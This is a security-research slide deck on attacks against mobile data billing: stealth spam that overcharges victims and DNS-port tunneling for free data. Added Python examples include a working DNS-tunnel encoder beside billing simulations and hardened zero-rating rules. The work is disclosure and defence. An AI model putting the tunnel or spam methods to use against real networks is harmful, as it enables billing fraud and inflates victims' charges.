MOBILE DATA CHARGING: NEW ATTACKS AND COUNTERMEASURES. Chunyi Peng, Chi-Yu Li, Guan-Hua Tu, Songwu Lu, Lixia Zhang (University of California, Los Angeles). ACM CCS'12. Slide deck: Peng-CCS12-slides.pdf


Page 1: Title

MOBILE DATA CHARGING: NEW ATTACKS AND COUNTERMEASURES

Chunyi Peng, Chi-Yu Li, Guan-Hua Tu, Songwu Lu, Lixia Zhang

University of California, Los Angeles

ACM CCS'12

Page 2: Mobile Data Access

ACM CCS'12 C Peng (UCLA)

1.2 billion global users

[Figure: mobile devices, Cellular Network (with Core Network), Internet]

Page 3: Mobile Data Charging

[Figure: mobile, Cellular Network, Internet, Bill]

Metered charging based on actual data usage, e.g., $20/month for 300MB (AT&T)

Security: Can any attack make the users pay MORE/LESS?

Page 4: How Charging Works & Is Secured

[Figure: Cellular Network with Authentication, Gateway, NAT, Accounting, Policy, Bill; Internet]

#1: Accounting @ core gateway only
#2: Both UL/DL per connection charged
#3: Policy defined by operators

Page 5: Two Security Issues

[Figure: Authentication, NAT, Bill]

#1: Can the attacker bypass the security mechanism and exploit a loophole in the charging architecture to make the users pay MORE? (Stealth-spam attack)

#2: Can the attacker exploit the charging policy to pay LESS? (Toll-free-data-access attack)

Page 6: Threat Models

Cellular network is not compromised
Charging subsystem works as designed
Security mechanism works as designed

Attacker's capability:
  Only use installed apps @ mobile, or
  Deploy malicious servers outside cellular networks

Page 7: Outline

Stealth-spam attack (pay MORE)
  Vulnerability
  Attack design & implementation & damage
  Countermeasures & insight

Toll-free-data-access attack (pay LESS)
  Vulnerability
  Attack design & implementation & damage
  Countermeasures & insight

Summary

Page 8: Stealth-Spam Attack

Page 9: Security Against Spamming

[Figure: Authentication, NAT, Bill; Outgoing-Spam and Incoming-Spam arrows]

Can the security mechanism (e.g., NAT/firewalls) block incoming spam?

Outgoing spam (due to malware @mobile or spoofing): simple, not addressed here.

NAT:
  Private IP addr. is not accessible from outside
  Access allowed only when initiated by the mobile

Page 10: Vulnerability

Different from conventional spamming (e.g., Email/SMS spam):
  ① trap the victim to open data access (init a data service)
  ② incoming spam from the attacker

Unawareness (stealthy)
Long-lived (lasting hours or longer)

[Figure: E-attacker -> NAT -> mobile; Data Services (charged); timeline of the actual charging time window, normal vs. attacked]

Page 11: Stealth-Spam Attack

Step 1 - Trap: init data access
  Example-1: click a malicious web link
  Example-2: log in to Skype once / stay online

Step 2 - Spam: keep spamming, no matter what status @mobile

Page 12: Web-based Attack

Implementation
  Phone: click a malicious web link
  Attacker (server): send spam data at a constant rate (disable TCP congestion control and tear-down)

Result: charging keeps going
  Even after the phone tears down TCP (TCP FIN, timeout)
  Even when many "TCP RESET" are sent from the mobile

Page 13: Damage vs. Spamming Rate

[Figure: charging volume vs. spamming rate, Operator-I and Operator-II]

In proportion to the spamming rate when the rate is low
Charging blocked when the rate is high (> 1Mbps)
The charged volume could be > the received one [Mobicom'12]

Page 14: Damage vs. Duration

Spamming rate = 150Kbps

No observed sign of ending when the attack lasts 2 hours at a low rate (spamming > 120MB)

Page 15: Skype-based Attack

Implementation
  Phone: do nothing (stay online once logged in to Skype)
  Attacker: Skype-call the victim and hang up
  Attacker (server): send spam data at a constant rate

Exploits a Skype "loophole": data access is allowed from the host who attempts to call the victim, before the attempt is accepted

Demo

Page 16: Demo: for a specific victim

Result: charging keeps going
  Even after Skype logout
  Even when there is no Skype call session
  Even when many "ICMP unreachable" are sent from the mobile

Page 17: Damage vs. Spamming Rate

[Figure: charging volume vs. spamming rate, Operator-I and Operator-II]

No bounds on the spamming rate, compared with the TCP-based attack

Page 18: Damage vs. Duration

Spamming rate = 50Kbps

No observed sign of ending when the attack lasts 24 hours (spamming > 500MB)

Page 19: Root Cause

[Figure: ① trap the victim to open data access (init a data service); ② incoming spam from the E-attacker via NAT; Bill]

Current system: secure only the initialization
  IP forwarding can push packets to the victim (not controlled by the victim)
#1: Initial authentication ≠ authentication all along

Current system: keep charging if data comes (local view @ core gateway)
  Different views @ mobile: the data conn. ends, or never starts, or an exception happens
  Lack of feedback/control
#2: Data flow termination @ the phone ≠ charging termination @ the operator

Page 20: Countermeasures

Spamming inevitable due to the IP push model

Remedy: stop early when spamming happens
  Detection of unwanted traffic @mobile/operator
  Feedback (esp. from the mobile to the operator)
    At least allow users to stop data charging (no service)
  Exploit/design mechanisms in cellular networks: implicit-block, explicit-allow, explicit-stop

Precaution, e.g., set a volume limit
Application: be aware of the spamming attack
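The two root causes (the gateway bills everything it forwards once the initial authentication has succeeded, and the phone's tear-down is not a charging tear-down) and the explicit-stop and volume-limit remedies, as an added example: a small Python model written for this page, not code from the authors or from any operator. The packet sizes, the IP addresses, the 40-byte reject and the "three rejects" threshold are assumptions chosen for illustration.

```python
"""Core-gateway accounting vs. the phone's view of a flow (added model, not the authors' code)."""
from __future__ import annotations
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str   # "TCP" or "ICMP"
    size: int


class Phone:
    """The mobile's local view: it accepts traffic only on flows it opened itself."""

    def __init__(self, ip: str) -> None:
        self.ip = ip
        self.open_peers: set[str] = set()
        self.received = 0          # bytes the phone actually accepted

    def open_flow(self, peer: str) -> None:    # step 1 (trap): the victim clicks the link
        self.open_peers.add(peer)

    def close_flow(self, peer: str) -> None:   # FIN / timeout at the phone
        self.open_peers.discard(peer)

    def deliver(self, pkt: Packet) -> Packet | None:
        """Accept the packet, or answer unsolicited traffic with a 40-byte TCP RST / ICMP unreachable (assumed size)."""
        if pkt.src in self.open_peers:
            self.received += pkt.size
            return None
        return Packet(self.ip, pkt.src, "TCP" if pkt.proto == "TCP" else "ICMP", 40)


class CoreGateway:
    """Accounting at the core gateway only (#1), both UL and DL charged (#2).

    feedback_threshold: the explicit-stop remedy, block a peer after N rejects from the phone.
    volume_limit: the precautionary per-subscriber cap.  Both are None in the design as studied.
    """

    def __init__(self, feedback_threshold: int | None = None, volume_limit: int | None = None) -> None:
        self.feedback_threshold = feedback_threshold
        self.volume_limit = volume_limit
        self.sessions: set[str] = set()         # subscribers whose initial authentication succeeded
        self.charged: dict[str, int] = {}       # subscriber IP -> bytes billed
        self.rejects: dict[tuple[str, str], int] = {}
        self.blocked: set[tuple[str, str]] = set()

    def attach(self, phone: Phone) -> None:
        self.sessions.add(phone.ip)
        self.charged[phone.ip] = 0

    def forward_downlink(self, pkt: Packet, phone: Phone) -> str:
        sub, key = pkt.dst, (pkt.dst, pkt.src)
        if sub not in self.sessions:
            return "no-session"   # NAT: nothing reaches a phone that has no data session
        if key in self.blocked:
            return "blocked"
        if self.volume_limit is not None and self.charged[sub] + pkt.size > self.volume_limit:
            return "limit"
        # Root cause: the packet is billed the moment it is forwarded, whatever the phone thinks of it.
        self.charged[sub] += pkt.size
        fb = phone.deliver(pkt)
        if fb is None:
            return "delivered"
        self.charged[sub] += fb.size   # the phone's RST / ICMP unreachable is uplink and is billed too
        if self.feedback_threshold is not None:
            self.rejects[key] = self.rejects.get(key, 0) + 1
            if self.rejects[key] >= self.feedback_threshold:
                self.blocked.add(key)  # explicit-stop: act on the phone's feedback
        return "rejected"


def run_attack(gateway: CoreGateway, n_packets: int, pkt_size: int, close_after: int) -> tuple[int, int]:
    """Victim opens one flow, accepts `close_after` packets, then tears it down; the attacker keeps
    sending.  Returns (bytes the phone accepted, bytes the operator billed)."""
    victim, attacker = Phone("10.0.0.7"), "203.0.113.9"   # constructed addresses
    gateway.attach(victim)
    victim.open_flow(attacker)
    for i in range(n_packets):
        if i == close_after:
            victim.close_flow(attacker)
        gateway.forward_downlink(Packet(attacker, victim.ip, "TCP", pkt_size), victim)
    return victim.received, gateway.charged[victim.ip]


if __name__ == "__main__":
    print("as studied:   ", run_attack(CoreGateway(), 1000, 1000, 10))
    print("explicit-stop:", run_attack(CoreGateway(feedback_threshold=3), 1000, 1000, 10))
    print("volume limit: ", run_attack(CoreGateway(volume_limit=500_000), 1000, 1000, 10))
```

With 1000 spam packets of 1000 bytes and the phone closing the flow after 10 of them, the as-studied gateway bills about 1 MB for 10 KB actually accepted, and the phone's own RSTs add to the bill; acting on three rejects cuts the bill to about 13 KB, and a volume cap bounds it at the cap. In the measured networks the RSTs and ICMP unreachables were sent but, as the previous slides report, had no effect on charging.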

Page 21: Toll-Free-Data-Access Attack

Page 22: Vulnerability

Both operators provide free DNS service

Policy: Free DNS Service
  DNS flow ID: (srcIP, destIP, srcPort, destPort, protocol)
  OP-I: packets via port 53 are free
  OP-II: packets via UDP + port 53 are free
  Bill (DNS) = 0

#1: free fake-DNS loophole
  Real data over port 53
  Bill (ANY-on-DNS) = 0

#2: no-volume-check loophole
  Any enforcement for packets over port 53?
  OP-I: no observed limits, except 29KB for one request packet
  OP-II: no observed limits

Page 23: Toll-Free-Data-Access Attack

Proxy outside the cellular network
Tunneling over port 53 between the mobile and the external network (similar to calling an 800 hotline)

Implementation
  HTTP proxy on port 53 (only for web, OP-I)
  SOCKS proxy on port 53 (for more apps, OP-I)
  DNS tunneling on UDP/53 (all apps, OP-I, OP-II)

Results: free data access > 200MB, no sign of limits

Demo if interested
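How the "DNS tunneling on UDP/53" item moves arbitrary bytes inside syntactically valid DNS queries, which is why it works on OP-II where the plain proxies do not: an added Python example written for this page, not the authors' tool and not iodine. The tunnel zone t.example, the chunk size and the s<seq> label format are assumptions; only the uplink framing is modelled, the downlink would ride back in the answer records of the tunnel server's response.

```python
"""Uplink framing for a DNS tunnel: payload bytes -> valid DNS query on UDP/53 (added example)."""
from __future__ import annotations
import base64
import struct

TUNNEL_ZONE = "t.example"   # assumed attacker-controlled zone; its authoritative server decodes the names
MAX_LABEL = 63              # RFC 1035 label limit
MAX_NAME = 253              # RFC 1035 name limit (text form)
CHUNK = 60                  # payload bytes per query (assumption; 60 bytes -> 96 base32 chars)


def encode_chunk(seq: int, data: bytes) -> str:
    """Frame one chunk as s<seq>.<base32 labels>.<zone>, a name any resolver will forward."""
    b32 = base64.b32encode(data).decode().rstrip("=").lower()   # DNS names are case-insensitive
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    name = ".".join([f"s{seq}", *labels, TUNNEL_ZONE])
    if len(name) > MAX_NAME:
        raise ValueError("chunk too large for one query name")
    return name


def decode_chunk(name: str) -> tuple[int, bytes]:
    """Inverse of encode_chunk, as the tunnel's authoritative server would run it."""
    labels = name.rstrip(".").split(".")
    zone = TUNNEL_ZONE.split(".")
    if labels[-len(zone):] != zone or not labels[0].startswith("s"):
        raise ValueError("not a tunnel name")
    seq = int(labels[0][1:])
    b32 = "".join(labels[1:-len(zone)]).upper()
    b32 += "=" * (-len(b32) % 8)                                 # restore base32 padding
    return seq, base64.b32decode(b32)


def build_query(txid: int, qname: str, qtype: int = 16) -> bytes:
    """Wire-format DNS query (RFC 1035 section 4.1): header + one question; qtype 16 = TXT."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)    # flags 0x0100: QR=0, opcode 0, RD=1
    question = b"".join(bytes([len(l)]) + l.encode("ascii") for l in qname.split(".")) + b"\x00"
    return header + question + struct.pack("!HH", qtype, 1)      # QCLASS 1 = IN


def parse_qname(msg: bytes) -> str:
    """Read the question name back out of a wire-format query (no compression in a question)."""
    off, labels = 12, []
    while msg[off] != 0:
        n = msg[off]
        labels.append(msg[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n
    return ".".join(labels)


def tunnel_uplink(payload: bytes, chunk: int = CHUNK) -> list[bytes]:
    """Split a payload into queries the mobile would send to the operator's resolver on UDP/53."""
    return [build_query(i, encode_chunk(i, payload[i * chunk:(i + 1) * chunk]))
            for i in range((len(payload) + chunk - 1) // chunk)]


def tunnel_reassemble(queries: list[bytes]) -> bytes:
    """What the attacker's authoritative server reconstructs from the forwarded queries."""
    chunks = sorted(decode_chunk(parse_qname(q)) for q in queries)
    return b"".join(data for _, data in chunks)


if __name__ == "__main__":
    msg = b"GET /index.html HTTP/1.1\r\nHost: proxied.example\r\n\r\n" * 3   # constructed payload
    qs = tunnel_uplink(msg)
    assert tunnel_reassemble(qs) == msg
    print(len(msg), "payload bytes in", len(qs), "queries,", sum(map(len, qs)), "bytes on the wire")
```

Every query here is a standard recursive query that the operator's resolver forwards to the zone's authoritative server, so a policy keyed only on the flow ID (UDP, port 53) sees ordinary DNS; the cost is roughly one 150-byte query per 60 payload bytes, which is why the slides report this path as slower but universal.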

Page 24: Countermeasures

Simplest fix: stop the free DNS service (OP-II stopped it this July, 2012)

Other suggestions
  Authenticate the DNS service
  Only allow using authenticated DNS resolvers
  DNS message integrity check
  Provide a free DNS quota
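The two operators' flow-ID rules from the Vulnerability slide beside a hardened rule that applies the suggestions above (only the operator's own resolvers are zero-rated, the packet must at least be a well-formed DNS query, and free DNS is capped by a quota), as an added Python example written for this page; it is not an operator's policy engine. The resolver address, the quota and the sample packets are constructed for the demo.

```python
"""Zero-rating policy for 'free DNS': the two operators' rules vs. a hardened rule (added example)."""
from __future__ import annotations
import struct
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    """The 5-tuple flow ID the charging policy is keyed on: srcIP, destIP, srcPort, destPort, protocol."""
    src_ip: str
    dst_ip: str
    src_port: int
    dst_port: int
    proto: str   # "UDP" or "TCP"


def op1_is_free(flow: Flow, payload: bytes) -> bool:
    """OP-I: anything via port 53 is free, regardless of protocol or content."""
    return 53 in (flow.src_port, flow.dst_port)


def op2_is_free(flow: Flow, payload: bytes) -> bool:
    """OP-II: UDP via port 53 is free; still no look at the content."""
    return flow.proto == "UDP" and 53 in (flow.src_port, flow.dst_port)


def is_wellformed_dns_query(payload: bytes) -> bool:
    """Minimal RFC 1035 check: 12-byte header, opcode QUERY, QR=0, exactly one question, valid name."""
    if len(payload) < 12:
        return False
    _txid, flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", payload[:12])
    if (flags >> 11) & 0xF != 0 or flags & 0x8000 or qdcount != 1:
        return False
    off = 12
    while True:
        if off >= len(payload):
            return False
        n = payload[off]
        off += 1
        if n == 0:
            break
        if n > 63 or n & 0xC0:   # label too long, or a compression pointer (illegal in a question name)
            return False
        off += n
    return off + 4 <= len(payload)   # QTYPE and QCLASS must follow the name


class HardenedPolicy:
    """Free only for well-formed queries to the operator's own resolvers, up to a per-subscriber quota."""

    RESOLVERS = {"198.51.100.53"}     # assumed operator-run resolver address
    QUOTA = 1_000_000                 # assumed free DNS bytes per subscriber per billing cycle

    def __init__(self) -> None:
        self.used: dict[str, int] = {}

    def is_free(self, flow: Flow, payload: bytes) -> bool:
        subscriber, peer = flow.src_ip, flow.dst_ip          # uplink packet from the mobile
        if flow.proto != "UDP" or flow.dst_port != 53 or peer not in self.RESOLVERS:
            return False
        if not is_wellformed_dns_query(payload):
            return False
        used = self.used.get(subscriber, 0)
        if used + len(payload) > self.QUOTA:
            return False                                     # quota exhausted: charge it
        self.used[subscriber] = used + len(payload)
        return True


MOBILE, PROXY, RESOLVER = "10.0.0.7", "203.0.113.9", "198.51.100.53"   # constructed addresses
HTTP_REQ = b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"               # constructed proxy request
DNS_QUERY = (b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"        # constructed: id, RD, qdcount=1
             + b"\x07example\x03com\x00" + b"\x00\x01\x00\x01")         # example.com A IN

SAMPLES = {
    "http-proxy-tcp-53": (Flow(MOBILE, PROXY, 40001, 53, "TCP"), HTTP_REQ),
    "raw-udp-53":        (Flow(MOBILE, RESOLVER, 40002, 53, "UDP"), HTTP_REQ),
    "dns-to-foreign":    (Flow(MOBILE, PROXY, 40003, 53, "UDP"), DNS_QUERY),
    "dns-to-operator":   (Flow(MOBILE, RESOLVER, 40004, 53, "UDP"), DNS_QUERY),
}


def classify() -> dict[str, tuple[bool, bool, bool]]:
    """(OP-I free?, OP-II free?, hardened free?) for each sample."""
    hardened = HardenedPolicy()
    return {name: (op1_is_free(f, p), op2_is_free(f, p), hardened.is_free(f, p))
            for name, (f, p) in SAMPLES.items()}


def free_queries_before_quota(query: bytes = DNS_QUERY) -> int:
    """A well-formed tunnel query to the operator's resolver is still free, but only QUOTA bytes of it."""
    policy, flow, n = HardenedPolicy(), Flow(MOBILE, RESOLVER, 40005, 53, "UDP"), 0
    while policy.is_free(flow, query):
        n += 1
    return n


if __name__ == "__main__":
    for name, (op1, op2, hard) in classify().items():
        print(f"{name:18} OP-I free={op1!s:5} OP-II free={op2!s:5} hardened free={hard}")
    print("queries zero-rated before the quota bites:", free_queries_before_quota())
```

The format check alone closes only the fake-DNS loophole: a DNS tunnel sends well-formed queries, so restricting zero-rating to the operator's own resolvers and capping it with a quota are what bound the loss, which is the point the next slide makes about the gap between a policy and its enforcement.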

Page 25: Beyond DNS

Existing DNS tunneling tools (iodine etc.) are designed for data access when Internet access is blocked

Differentiated-charging policy, e.g., free access to one website / via some APN, or cheaper VoIP than Web
  Incentive to pay less (attackers or even normal users)
  Gap between policy and its enforcement

[Figure: Bill]

Bullet-proof design & practice

Page 26: On Incentive

Toll-free-data-access attack ✔

Stealth-spam attack
  Good news: no obvious and strong incentive
  No immediate gain for the attacker, unless an ill-intentioned operator does it
  Monetary loss against the attacker's adversary
  Unexpected incentive in the future?

Page 27: Summary

More information/demo in http://metro.cs.ucla.edu/projects.html

Assess the vulnerability of 3G/4G data charging systems

Two types of attacks
  Toll-free-data-access attack (free > 200MB): enforcement of differentiated-charging policy
  Stealth-spam attack (overcharging > 500MB): rooted in the charging architecture, security mechanism and IP model
  No observed volume limits

Insight
  The IP push model is not ready for metered charging
  Feedback or control is needed during data charging
  Differentiated-charging policy has to secure itself